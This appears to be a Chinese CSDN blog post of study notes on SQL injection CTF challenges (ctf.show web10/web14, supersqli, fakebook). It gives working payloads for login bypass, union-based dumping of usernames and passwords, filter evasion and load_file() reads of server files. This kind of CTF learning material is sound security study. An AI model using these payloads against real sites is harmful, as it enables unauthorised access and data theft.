sql注入相关题目

已于 2024-04-18 22:01:08 修改
阅读量366 收藏 7
点赞数 4
文章标签: 安全
于 2024-03-31 11:00:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangzhemvp/article/details/137146704
版权

1.ctf.show_web10

(1)$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";

(2)没有回显

(3)只要用户名密码正确,即可得到flag 

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

1.group by 

2.with rollup 

ctf.show_web10-CSDN博客

是不是所有的登录框都可以用它呢?要确定它是否可以用户名密码都为空。

2.【攻防世界】supersqli

攻防世界-supersqli详解-CSDN博客

(1) preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

(2)有回显

show databases;

show tables;

show columns from `表名`;        //不是单引号

//查看字段

handler `表名` open as `a`;
handler `a` read next;

【MySQL】MySQL 之 handler 的详细使用及说明_mysql handler-CSDN博客

3.ctf.show_web14

在Switch中,case 里如果没有 break,则会继续向下执行 case 

1.有输入框,sql注入

2.输入 -1 union select databases--+ 没反应,可能存在过滤。

空格用 /**/        

information_schema.tables 或 .columns  用反引号 information_schema.`tables`

--+ 一般用 #

3.同时查3个字段

?query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content 

4.从数据库中查看文件内容,mysql提供了读取本地文件的函数load_file()

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

CTF show WEB14_ctf.show_web14-CSDN博客

4.【攻防世界】fakebook

1.本道题真的要创建一个博客。创建完后在登录,发现?no=1 。sql注入

 ?no=-1 union/**/select 1,user(),3,4--+ 

发现在 root 权限下 ,用 load_file

 ?no=-1 union/**/select/**/1,load_file("/var/www/html/flag.php"),3,4--+

buuctf-[网鼎杯 2018]Fakebook 1 - junlebao - 博客园 (cnblogs.com)

echo‘’wang
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于一个SQL注入题目的思考
12-14
p牛在群里面出了一个好玩的题目,正好晚上空虚寂寞冷,做一下暖暖身子,题目是: <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_...
SQL注入--题目
lulu001128的博客
07-26 363
解题过程
SQL注入相关例题(ctfhub)
2401_82388450的博客
04-01 647
例题。
bugku SQL注入题目合集
xuchen16的博客
09-30 2610
转载自:http://www.northity.com/2018/06/12/Bugku%E9%A2%98%E7%9B%AE%E9%9B%86%E9%94%A60x02/ SQL注入题目合集 这是一个神奇的登陆框 传送门 在用户名的后面加一个\可以看到报错,应该是能够报错注入或者联合查询之类的 但是最近学到了一些骚套路,先来看看sqlmap sqlmap 直接burp抓包另存为一个t...
SQLMAP解决sql注入CTF题目
sleepywin的博客
03-23 346
sqlmap解决sql注入
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1559
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
cisp-pte基础题目SQL注入
weixin_53313406的博客
11-25 2879
cisp-pte基础题目SQL注入(超详细)
SQL注入相关【面试题】
热门推荐
anan的博客
12-09 1万+
本篇文章主要收集和SQL注入相关的面试题,持续更新,当然由于博主的时间不太充裕,可能更新会不是很及时,但是相信我,再晚,他都会来!
SQL注入题目
Pvr1sC的博客
03-17 815
极客大挑战2019 EasySQL 简单题,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
sql注入(基础)题解
agoodboy6的博客
11-04 224
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此题对回显长度有限制。table-name与table-name呼应。
BUUCTF web SQL注入
m0_55854679的博客
08-09 2672
文章目录[极客大挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客大挑战 2019]LoveSQL[极客大挑战 2019]BabySQL [极客大挑战 2019]EasySQL 根据题目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据题目,可以想到此题目sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
中职网络安全题目逆向-SQL注入环境创建-题目环境
09-21
自己根据网上的题目解答,逆向制作的SQL注入题目环境。可以根据解答方法进行练习 使用方法: 用phpstudy2016配置 将解压后的文件夹放在网站根目录下 将解压后的文件夹lpplpp(这个里面是数据库)拷贝到数据库所在...
SQL注入漏洞演示源代码-曾是土木人
11-01
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
基于错误回显的SQL注入整理
12-14
 用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 366
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 968
Token安全是网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值